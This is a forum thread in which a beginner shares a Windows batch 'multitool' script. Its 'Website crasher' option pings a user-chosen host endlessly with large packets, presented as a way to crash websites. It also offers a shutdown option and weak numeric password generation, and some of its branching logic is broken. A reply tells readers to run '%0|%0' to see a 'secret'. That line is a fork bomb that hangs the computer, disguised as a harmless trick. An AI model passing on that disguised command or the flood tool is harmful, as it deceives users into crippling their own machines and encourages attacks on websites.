1. Hey Guest, is it this your first time on the forums?

    Visit the Beginner's Box

    Introduce yourself, read some of the ins and outs of the community, access to useful links and information.

    Dismiss Notice

Other Batch file multitool

Discussion in 'Modding [KAG]' started by War_Crab, Mar 14, 2015.

  1. War_Crab

    War_Crab Ballista Bolt Thrower

    Messages:
    39
    Code:
    @echo off
    TITLE Multitool
    color 0a
    echo Please select a command.
    echo.
    echo [1] Quick select
    echo [2] Shutdown
    echo [3] Logoff
    echo [4] Website crasher
    echo [5] Password generator (numbers)
    echo [6] Matrix
    echo.
    echo [e] Exit
    echo.
    set /p "number=--> "
    if %number%==e goto e.1
    if %number%==1 goto 1.1
    if %number%==2 goto 2.1
    if %number%==3 goto 3.1
    if %number%==4 goto 4.1
    if %number%==5 goto 5.1
    if %number%==6 goto 6.1
    
    :e.1
    Exit
    :1.1
    @echo off
    color 0a
    echo ***************************************************************
    echo.
    echo                         Site Selector
    echo.
    echo ***************************************************************
    echo.
    echo [1] www.youtube.com
    echo [2] www.kagforum.com
    echo [3] www.putlocker.is
    echo [4] www.couchtuner.eu
    echo [5] www.google.com
    echo [6] www.netflix.com
    echo.
    echo e= Exit
    echo.
    echo ***************************************************************
    echo Enter the number of the website of which you would like to go
    echo.
    set/p "number=-->"
    echo.
    echo ***************************************************************
    if %number%==1 GOTO 1
    if %number%==2 GOTO 2
    if %number%==3 GOTO 3
    if %number%==4 GOTO 4
    if %number%==5 GOTO 5
    if %number%==6 GOTO 6
    if %number%==e GOTO
    :1
    start www.youtube.com
    goto end
    :2
    start www.kagforum.com
    goto end
    :3
    start www.putlocker.is
    goto end
    :4
    start www.couchtuner.eu
    goto end
    :5
    start www.hulu.com
    goto end
    :6
    start www.netflix.com
    goto end
    :e
    exit
    goto end
    :end
    :2.1
    @echo off
    @title Shutdown script
    
    :shutdown
    cls
    echo Would you like to shutdown (Y/N)
    echo.
    set /p input0=Enter:
    
    if %input0% equ y goto shutdownsequence
    if %input0% equ n goto exit
    
    :shutdownsequence
    shutdown.exe /s /t 00
    :3.1
    @echo off
    @title Logoff script
    
    :logoff
    cls
    echo Would you like to logoff (Y/N)
    echo.
    set /p input0=Enter:
    
    if %input0% equ y goto logoffsequence
    if %input0% equ n goto exit
    
    :logoffsequence
    shutdown -l
    :4.1
    :A
    @echo off
    Title Website Crasher
    color 0e
    echo Enter the website you would like to crash
    set input=
    set /p input= Enter your Website here:
    if %input%==goto A if NOT B
    echo Processing Your request
    ping localhost>nul
    echo To end Crashing press CTRL + C
    ping localhost>nul
    cls
    echo ----------------------------------------------------------------------
    echo Now Crashing Website...DO NOT CLOSE THIS BOX!! PRESS CRTL + C TO END!!
    echo ----------------------------------------------------------------------
    ping %input% -t -l 1000
    :5.1
    @echo off
    :Start2
    cls
    goto Start
    :Start
    title Password Generator
    echo I will make you a new password.
    echo Please write the password down somewhere in case you forget it.
    echo ---------------------------------------------------------------
    echo 1) 1 Random Password
    echo 2) 5 Random Passwords
    echo 3) 10 Random Passwords
    echo Input your choice
    set input=
    set /p input= Choice:
    if %input%==1 goto P if NOT goto Start2
    if %input%==2 goto B if NOT goto Start2
    if %input%==3 goto C if NOT goto Start2
    :P
    cls
    echo Your password is %random%
    echo Now choose what you want to do.
    echo 1) Go back to the beginning
    echo 2) Exit
    set input=
    set /p input= Choice:
    if %input%==1 goto Start2 if NOT goto Start 2
    if %input%==2 goto Exit if NOT goto Start 2
    :Exit
    exit
    :B
    cls
    echo Your 5 passwords are %random%, %random%, %random%, %random%, %random%.
    echo Now choose what you want to do.
    echo 1) Go back to the beginning
    echo 2) Exit
    set input=
    set /p input= Choice:
    if %input%==1 goto Start2 if NOT goto Start 2
    if %input%==2 goto Exit if NOT goto Start 2
    :C
    cls
    echo Your 10 Passwords are %random%, %random%, %random%, %random%, %random%, %random%, %random%, %random%, %random%, %random%
    echo Now choose what you want to do.
    echo 1) Go back to the beginning
    echo 2) Exit
    set input=
    set /p input= Choice:
    if %input%==1 goto Start2 i
    :6.1
    @echo off
    color 0a
    :U
    echo 7 y x 3 8 G M P q 1 F 0 U v c i j
    ping localhost -n 1 > nul
    echo o D s a E I j H 9 t 6 7 z C B 4 g 8
    ping localhost -n 1 > nul
    echo g F x 6 A e 9 1 b M W r T h k P 8 3
    ping localhost -n 1 > nul
    echo j G a e 3 5 B x Z Q p 0 o 2 h V u C
    ping localhost -n 1 > nul
    echo 7 f S E A q p 7 b d h U C V 1 4 8 3
    ping localhost -n 1 > nul
    goto U
    
    
    
    
    
    
    Im learning how to make batch files and this is my first one. Can someone tell if its good?
    (to activate open notepad, paste in the code, save it as Multitool.bat (make sure its saved under all files))
     
  2. -Q

    -Q Donator

    Messages:
    153
    A description would be good. What does this tool do, and what can it be used for? Other than that, great script. Batch files have more capability than most people think.

    On that note, please paste "%0|%0" as the first line of a batch file, and run it to see a secret that's not very well known.
     
    blackjoker77777 likes this.